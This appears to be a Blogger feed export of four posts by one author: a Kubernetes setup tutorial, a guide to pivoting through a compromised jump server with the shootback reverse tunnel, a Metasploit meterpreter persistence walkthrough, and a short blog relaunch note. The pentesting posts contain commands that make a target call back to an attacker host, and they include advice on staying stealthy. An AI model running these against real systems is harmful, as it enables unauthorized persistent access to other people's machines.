tag:blogger.com,1999:blog-59563947512257092302024-03-05T09:19:50.654+04:00Subhash DasyamUnknownnoreply@blogger.comBlogger4125tag:blogger.com,1999:blog-5956394751225709230.post-61043736736080653302019-12-05T17:13:00.002+04:002019-12-05T17:14:11.393+04:00Setting up Kubernetes v1.16.3 in Ubuntu 18.04 using kubeadm<br />
This tutorial is going to show how to setup your own kubernetes cluster (v.1.16.3 or latest) on ubuntu 18.04<br />
<br />
<br />
Here i am installing kubernetes cluster on 3 servers<br />
<br />
<span style="color: #0b5394; font-size: x-large;"><b>On all 3 servers</b></span><br />
<br />
First, set up the Docker and Kubernetes repositories:<br />
<br />
<br />
<pre style="-webkit-font-smoothing: antialiased; background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; color: #333333; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; overflow-wrap: break-word; overflow: auto; padding: 9.5px; word-break: break-all;"><code style="-webkit-font-smoothing: antialiased; background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: inherit; padding: 0px; white-space: pre-wrap;">curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu \
$(lsb_release -cs) \
stable"
curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg | sudo apt-key add -
cat << EOF | sudo tee /etc/apt/sources.list.d/kubernetes.list
deb https://apt.kubernetes.io/ kubernetes-xenial main
EOF</code></pre>
<br />
<br />
Install Docker and Kubernetes packages:<br />
<br />
Note that if you want to use a newer version of Kubernetes, change the version installed for kubelet, kubeadm, and kubectl. Make sure all three use the same version.<br />
<br />
<br />
<pre style="-webkit-font-smoothing: antialiased; background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; color: #333333; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; overflow-wrap: break-word; overflow: auto; padding: 9.5px; word-break: break-all;"><code style="-webkit-font-smoothing: antialiased; background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: inherit; padding: 0px; white-space: pre-wrap;">sudo apt-get update
sudo apt-get install -y docker-ce=18.09 kubelet kubeadm kubectl
sudo apt-mark hold docker-ce kubelet kubeadm kubectl</code></pre>
<div style="-webkit-font-smoothing: antialiased; background-color: white; box-sizing: border-box; color: #182b37; font-family: omnes-pro, Omnes, Helvetica, Arial, sans-serif; font-size: 16px;">
Enable iptables bridge call:</div>
<pre style="-webkit-font-smoothing: antialiased; background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; color: #333333; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; overflow-wrap: break-word; overflow: auto; padding: 9.5px; word-break: break-all;"><code style="-webkit-font-smoothing: antialiased; background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: inherit; padding: 0px; white-space: pre-wrap;">echo "net.bridge.bridge-nf-call-iptables=1" | sudo tee -a /etc/sysctl.conf
sudo sysctl -p</code></pre>
<h4 style="-webkit-font-smoothing: antialiased; background-color: white; box-sizing: border-box; color: #29485b; font-family: omnes-pro, Omnes, Helvetica, Arial, sans-serif; font-size: 18px; line-height: 1em; margin: 25px 0px;">
On the Kube master server</h4>
<br />
<div style="-webkit-font-smoothing: antialiased; background-color: white; box-sizing: border-box; color: #182b37; font-family: omnes-pro, Omnes, Helvetica, Arial, sans-serif; font-size: 16px;">
Initialize the cluster:</div>
<pre style="-webkit-font-smoothing: antialiased; background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; color: #333333; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; overflow-wrap: break-word; overflow: auto; padding: 9.5px; word-break: break-all;"><code style="-webkit-font-smoothing: antialiased; background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: inherit; padding: 0px; white-space: pre-wrap;">sudo kubeadm init --pod-network-cidr=10.244.0.0/16</code></pre>
<div style="-webkit-font-smoothing: antialiased; background-color: white; box-sizing: border-box; color: #182b37; font-family: omnes-pro, Omnes, Helvetica, Arial, sans-serif; font-size: 16px;">
Set up local kubeconfig:</div>
<pre style="-webkit-font-smoothing: antialiased; background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; color: #333333; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; overflow-wrap: break-word; overflow: auto; padding: 9.5px; word-break: break-all;"><code style="-webkit-font-smoothing: antialiased; background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: inherit; padding: 0px; white-space: pre-wrap;">mkdir -p $HOME/.kube
sudo cp -i /etc/kubernetes/admin.conf $HOME/.kube/config
sudo chown $(id -u):$(id -g) $HOME/.kube/config</code></pre>
<div style="-webkit-font-smoothing: antialiased; background-color: white; box-sizing: border-box; color: #182b37; font-family: omnes-pro, Omnes, Helvetica, Arial, sans-serif; font-size: 16px;">
<br /></div>
<div style="-webkit-font-smoothing: antialiased; background-color: white; box-sizing: border-box; color: #182b37; font-family: omnes-pro, Omnes, Helvetica, Arial, sans-serif; font-size: 16px;">
<span style="-webkit-font-smoothing: antialiased; box-sizing: border-box; font-weight: 600;">Note:</span> If you are using Kubernetes 1.16 or later, you will need to use a newer flannel installation yaml instead:</div>
<pre style="-webkit-font-smoothing: antialiased; background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; color: #333333; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; overflow-wrap: break-word; overflow: auto; padding: 9.5px; word-break: break-all;"><code style="-webkit-font-smoothing: antialiased; background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: inherit; padding: 0px; white-space: pre-wrap;">kubectl apply -f https://raw.githubusercontent.com/coreos/flannel/3f7d3e6c24f641e7ff557ebcea1136fdf4b1b6a1/Documentation/kube-flannel.yml</code></pre>
<h4 style="-webkit-font-smoothing: antialiased; background-color: white; box-sizing: border-box; color: #29485b; font-family: omnes-pro, Omnes, Helvetica, Arial, sans-serif; font-size: 18px; line-height: 1em; margin: 25px 0px;">
On each Kube node server</h4>
<div style="-webkit-font-smoothing: antialiased; background-color: white; box-sizing: border-box; color: #182b37; font-family: omnes-pro, Omnes, Helvetica, Arial, sans-serif; font-size: 16px;">
Join the node to the cluster:</div>
<pre style="-webkit-font-smoothing: antialiased; background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; color: #333333; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; overflow-wrap: break-word; overflow: auto; padding: 9.5px; word-break: break-all;"><code style="-webkit-font-smoothing: antialiased; background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: inherit; padding: 0px; white-space: pre-wrap;">sudo kubeadm join $controller_private_ip:6443 --token $token --discovery-token-ca-cert-hash $hash</code></pre>
<h4 style="-webkit-font-smoothing: antialiased; background-color: white; box-sizing: border-box; color: #29485b; font-family: omnes-pro, Omnes, Helvetica, Arial, sans-serif; font-size: 18px; line-height: 1em; margin: 25px 0px;">
On the Kube master server</h4>
<div style="-webkit-font-smoothing: antialiased; background-color: white; box-sizing: border-box; color: #182b37; font-family: omnes-pro, Omnes, Helvetica, Arial, sans-serif; font-size: 16px;">
Verify that all nodes are joined and ready:</div>
<pre style="-webkit-font-smoothing: antialiased; background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; color: #333333; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; overflow-wrap: break-word; overflow: auto; padding: 9.5px; word-break: break-all;"><code style="-webkit-font-smoothing: antialiased; background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: inherit; padding: 0px; white-space: pre-wrap;">kubectl get nodes</code></pre>
<div style="-webkit-font-smoothing: antialiased; background-color: white; box-sizing: border-box; color: #182b37; font-family: omnes-pro, Omnes, Helvetica, Arial, sans-serif; font-size: 16px;">
You should see all three servers with a status of Ready:</div>
<pre style="-webkit-font-smoothing: antialiased; background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; color: #333333; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; overflow-wrap: break-word; overflow: auto; padding: 9.5px; word-break: break-all;"><code style="-webkit-font-smoothing: antialiased; background-color: transparent; border-radius: 0px; box-sizing: border-box; color: inherit; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: inherit; padding: 0px; white-space: pre-wrap;">NAME STATUS ROLES AGE VERSION
ip-192-168-2-101 Ready master 54m v1.16.3
ip-192-168-2-102 Ready <none> 49m v1.16.3
ip-192-168-2-103 Ready <none> 49m v1.16.3</code></pre>
<br />Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-5956394751225709230.post-46572018187194564622019-12-05T03:13:00.001+04:002019-12-05T03:16:59.362+04:00Pentesting servers behind NAT | Reverse RDP Windows | Reverse SSH <br />
Good day viewers,<br />
<br />
Today i brought another interesting scenario on pentesting servers which are behind NAT or Windows Reverse RDP/SSH in lamen words connecting to windows/linux/xxxxx servers via RDP/SSH/TCP/UDP which are behind NAT.<br />
<br />
in r/explainlikeimfive words<br />
<br />
Imagine you are auditing / pentesting a server and you found a RCE on the server, unfortunately the server is just a bastion / jump server and there are application servers behind the jump server which are on private network and not exposed to public network. You need to find a way to audit the application servers listening on private network or you want to connect to these servers via SSH / RDP / TCP / UDP. How do we achieve that ? Yes I know there are number of ways to connect to these so let me explain you one way which i found was easy.<br />
<br />
I tried many different netcat scenarios routing ports internally connecting via socat etc., without any luck.<br />
I tried to do reverse SSH tunnel using plink, but here we have to expose our ssh username and password on the target pc, which i would never recommend this in pentesting if you want to be discrete.<br />
<br />
Finally, I found what i was looking for "a reverse TCP tunnel which let you access target behind NAT or firewall" - <a href="https://github.com/aploium/shootback" rel="nofollow" target="_blank">shootback </a><br />
<br />
It works fairly simple when you cannot directly connect to private networks directly it will let private networks connect back to you via jumpserver.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVfABsmB_GSrnP4Jww8BCgeWJRTkSHPJbNsGhG2uXd52SHFBjbWdpzteZVt7dMoG-zAggQw-JXoo6SCcrUmmawyiuTp9zbMGDLJt11FRvymRXQDwELq0_TVjzokqWX5h2-HMY6sl1i8XpJ/s1600/graph.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="694" data-original-width="898" height="494" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVfABsmB_GSrnP4Jww8BCgeWJRTkSHPJbNsGhG2uXd52SHFBjbWdpzteZVt7dMoG-zAggQw-JXoo6SCcrUmmawyiuTp9zbMGDLJt11FRvymRXQDwELq0_TVjzokqWX5h2-HMY6sl1i8XpJ/s640/graph.png" width="640" /></a></div>
<br />
<br />
<b><span style="font-size: large;"><u>Your Machine</u></span></b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIbJiJv9ly03C-N35TZFAygVriYMgJarT-2LQV-nG_jPFTh2wT8y4n8mLiZUheHPo2vzuCrpluqzq0O3WtQbNN_BQFbBOeb8CGPQ84_65aAXWrcpKj7ZquvpneVd_JFgOW3QJlpIyr95X2/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="71" data-original-width="938" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIbJiJv9ly03C-N35TZFAygVriYMgJarT-2LQV-nG_jPFTh2wT8y4n8mLiZUheHPo2vzuCrpluqzq0O3WtQbNN_BQFbBOeb8CGPQ84_65aAXWrcpKj7ZquvpneVd_JFgOW3QJlpIyr95X2/s1600/1.png" /></a></div>
<br />
<b><u>Syntax</u></b><br />
<br />
<b>python3 master.py -m</b> <span style="background-color: #cccccc;"><YOUR IP ADDRESS></span><b style="background-color: yellow;">:</b><span style="background-color: #cccccc;"><YOUR_LISTEN_PORT></span> <b>-c</b> <span style="background-color: #999999;"><YOUR IP ADDRESS></span><b style="background-color: yellow;">:</b><span style="background-color: #999999;"><YOUR_LISTEN_PORT_REDIRECTED_PORT></span><br />
<br />
<b><u>Example</u></b><br />
<div style="text-align: center;">
<blockquote class="tr_bq">
<b>python3 master.py -m 0.0.0.0:9999 -c 0.0.0.0:7676</b></blockquote>
</div>
<br />
<br />
<span style="font-size: large;"><b><u>On JumpServer / Target Machine</u></b></span><br />
<span style="font-size: large;"><b><u><br /></u></b></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYrQS07SdjhuWAxglAf3cLTTcdN2kuDnj-CTgR_Q_CugkVUL6ZIkgZKg6MJZ-HydhWX8APINAKuQVX1DmN21MNQYMq1KisjyhPFKlzzIs75L9CT3DIQcv5Hhb_hTW2ALy4SVmPTNyihDXV/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="19" data-original-width="489" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYrQS07SdjhuWAxglAf3cLTTcdN2kuDnj-CTgR_Q_CugkVUL6ZIkgZKg6MJZ-HydhWX8APINAKuQVX1DmN21MNQYMq1KisjyhPFKlzzIs75L9CT3DIQcv5Hhb_hTW2ALy4SVmPTNyihDXV/s1600/2.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><u>Syntax</u></b></div>
<br />
<b>python.exe slaver.py -m </b><span style="background-color: #999999;"><YOUR_PUBLIC_IP or DYNAMIC DNS></span><b>:</b><span style="background-color: #999999;"><YOUR_LISTEN_PORT></span> <b>-t </b><span style="background-color: #cccccc;"><TARGET_APPLICATION_IP_ADDRESS></span><b>:</b><span style="background-color: #cccccc;"><TARGET_APPLICATION_PORT></span><br />
<br />
<b><u>Example</u></b><br />
<div style="text-align: center;">
<blockquote class="tr_bq">
<b>python.exe slaver.py -m thisisexample.dyndns.com:9999 -t 10.30.11.54:3389</b></blockquote>
</div>
<br />
<br />
Once you run the above command you will see the connection being established to your listening machine<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHrKyHmgup4H15U5xznrKqfbnLKESusnK3V0zLVj1UaoCoJ1xrXHPOWWvRu4BGKEQ1R0Wp-j-NXGkVUaQfxY_9mWsInB5ww9ncsl7IwS6M01wn-XB-Yu0M0FSVW7EAtshznA2ycQq8ESc-/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="103" data-original-width="688" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHrKyHmgup4H15U5xznrKqfbnLKESusnK3V0zLVj1UaoCoJ1xrXHPOWWvRu4BGKEQ1R0Wp-j-NXGkVUaQfxY_9mWsInB5ww9ncsl7IwS6M01wn-XB-Yu0M0FSVW7EAtshznA2ycQq8ESc-/s1600/3.png" /></a></div>
<br />
Now we see the connection is being forwarded to 7676 port, we should be able to connect to our local ip address on the port 7676<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM-RZKpfRlzUSbu7Q2PT2BmavKxdhgTl1K4qc1XoDx1n3yKenVFQqosK-SiBp2hGVZciYX-n_UYAGRq-184ZNVxEJI09uc1IkEptZy9T0bDucDX0nM3G0thn_W77WgQjLL66yRL3OcebFX/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="179" data-original-width="539" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM-RZKpfRlzUSbu7Q2PT2BmavKxdhgTl1K4qc1XoDx1n3yKenVFQqosK-SiBp2hGVZciYX-n_UYAGRq-184ZNVxEJI09uc1IkEptZy9T0bDucDX0nM3G0thn_W77WgQjLL66yRL3OcebFX/s640/4.png" width="640" /></a></div>
<br />
<br />
<br />
Voila!!! here it is i am connected to the private network behind a load balancer / NAT via jumpserver<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDUUCRQF79mqnV8NBIDYTL2jFcxMd8gah3xDmmH4YgFU4Jk_9tLzR2tTEgmaOSkHNm3rGNqu55E1F23LKc1mowFUTh7S9plDLatl-RpsqnUtujMGOnr3ukA8ZmRJ2xIYUIWD4_uiTCk_ep/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="564" data-original-width="1600" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDUUCRQF79mqnV8NBIDYTL2jFcxMd8gah3xDmmH4YgFU4Jk_9tLzR2tTEgmaOSkHNm3rGNqu55E1F23LKc1mowFUTh7S9plDLatl-RpsqnUtujMGOnr3ukA8ZmRJ2xIYUIWD4_uiTCk_ep/s400/5.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Tip</b>: <i>If the target system doesn't have python you can always upload a portable python zip file and extract it, use your creativity.</i></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Disclaimer: This is strictly for educational purposes only, please use this responsibly. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Cheers. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5956394751225709230.post-57671206918677325532019-12-04T02:02:00.002+04:002019-12-04T02:02:41.021+04:00Metasploit Meterpreter Persistence even when you are not listening on the port | Just like a RAT<br />
<br />
I came across an interesting dilemma, whether we can use meterpreter as a proper persistence remote adminsitration tool.<br />
<br />
When i started exploring, i found that we can indeed make meterpreter session persistence, i.e., when you disconnect your PC and connect back the connection connects back to your meterpreter exploit handler<br />
<br />
Lets see how to do this<br />
<br />
Assume you have created the meterpreter payload (elf or windows binary) and you have started your handler on the port of your choice<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTlLdZBt-A9BCjimPmysObXldsXTs7GSVQdTRgkvjfG8yemzFEl2yJRVVfoboLvRLnBVj77X8qkTJqOWQFujQF-oWfzK5klNqj2F_I7zCaa9-fWT62ZbcSsxXccJBLuTH4zCxCYd493WbJ/s1600/msfconsole-readyAndListening.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="305" data-original-width="682" height="177" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTlLdZBt-A9BCjimPmysObXldsXTs7GSVQdTRgkvjfG8yemzFEl2yJRVVfoboLvRLnBVj77X8qkTJqOWQFujQF-oWfzK5klNqj2F_I7zCaa9-fWT62ZbcSsxXccJBLuTH4zCxCYd493WbJ/s400/msfconsole-readyAndListening.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Assume we got the connection back after executing the meterpreter binary</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCn4PSJG2HAcRDffg0jpKNFi9HvE3l3P_280MmC3D19UVgCwqXjfvYWYnLcJkTQVZ8LcnOldz5DtFMPbrjkEBGrpl9LrGGxv5rekKueLwiZhxSFd59e41u85x8dqvPW36Pc7CC0YAfDqB8/s1600/msfconsole-sysinfo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="227" data-original-width="683" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCn4PSJG2HAcRDffg0jpKNFi9HvE3l3P_280MmC3D19UVgCwqXjfvYWYnLcJkTQVZ8LcnOldz5DtFMPbrjkEBGrpl9LrGGxv5rekKueLwiZhxSFd59e41u85x8dqvPW36Pc7CC0YAfDqB8/s400/msfconsole-sysinfo.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
At this point, we are going to make the backdoor persistent, since otherwise, if the victim turns off the PC, the connection will be lost as long as it does not “visualize” the image again. To avoid this, we should use a Ruby script called “persistence” written by Carlos Perez. Showing the help:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://github.com/rapid7/metasploit-framework/blob/master/scripts/meterpreter/persistence.rb">https://github.com/rapid7/metasploit-framework/blob/master/scripts/meterpreter/persistence.rb</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi-BcGHpXqHA5mzKQ2bM23TjzZDSODgYAOAcdLX-dEwE1K2yciz0DFsuFFyddjFYWEDT_XlFNHD2FiGCdQyGnXkVNqVSYfORFRjXdFCpMyc_tUQUAtuO0_pS9zY2Jr1skkD5tTQjkcCn1V/s1600/msfconsole-script-persistence-help.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="441" data-original-width="944" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi-BcGHpXqHA5mzKQ2bM23TjzZDSODgYAOAcdLX-dEwE1K2yciz0DFsuFFyddjFYWEDT_XlFNHD2FiGCdQyGnXkVNqVSYfORFRjXdFCpMyc_tUQUAtuO0_pS9zY2Jr1skkD5tTQjkcCn1V/s640/msfconsole-script-persistence-help.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
So seeing this, our command will be:<br />
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
<b style="background-color: black;"><span style="color: white;">run persistence -U -i 5 -p 4444 -r 192.168.1.36</span></b></blockquote>
<br />
That is, every time the victim starts the session, the backdoor will try to open the connection every 5 seconds to the address 192.168.1.36:4444. The interval to choose will depend on what the attacker wants, if you want it to be a bit more stealthy, maybe with 5 min it is fine, if the interval is small, it is more likely to be detected.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5GwR36jDpZSLrDWEo6P2uNh8fhOwDC1_G6HfDMqCfsgL5S3jRDcaJbwkwvXg5bkxoWtaHCUIU0ZXKDmjG3Xh855AMkDmxnTn3P7U57ZeWx-VIycCKdJQ_Pl87NITOyOu14bQICEbo-fqF/s1600/msfconsole-script-persistence-launched.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="325" data-original-width="943" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5GwR36jDpZSLrDWEo6P2uNh8fhOwDC1_G6HfDMqCfsgL5S3jRDcaJbwkwvXg5bkxoWtaHCUIU0ZXKDmjG3Xh855AMkDmxnTn3P7U57ZeWx-VIycCKdJQ_Pl87NITOyOu14bQICEbo-fqF/s640/msfconsole-script-persistence-launched.png" width="640" /></a></div>
<br />
<br />
Cheers, use this responsibly<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5956394751225709230.post-45735949217281881002019-12-03T18:08:00.000+04:002019-12-04T00:35:53.603+04:00Resurrection <table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container tr_bq" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1O2gpu6nKY0j0I7GGR7mayylIYhqRlFGEfraPCN9rfUJV8AKOzpNrwakRq1sQa0XmOqS_BqzAP1tXPFGbWP9XThgR2460mB8kb92ec-6E8uPABKwt2bSYhPw3JJ4xoZGpc4s7dIQrP18Y/s1600/resurrection.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="Source: http://www.geekchicelite.com/interview-kevin-sizemore-resurrection/" border="0" data-original-height="900" data-original-width="1600" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1O2gpu6nKY0j0I7GGR7mayylIYhqRlFGEfraPCN9rfUJV8AKOzpNrwakRq1sQa0XmOqS_BqzAP1tXPFGbWP9XThgR2460mB8kb92ec-6E8uPABKwt2bSYhPw3JJ4xoZGpc4s7dIQrP18Y/s400/resurrection.jpg" title="Resurrection" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
<hr />
<i>My Old blog is not completely cleaned, it may had some important code which i am thinking to shift to my github :). </i><br />
<br />
<div style="text-align: center;">
<i>New blog will be concentrating on improved technical analogy in vast variety of subjects</i></div>
Unknownnoreply@blogger.com0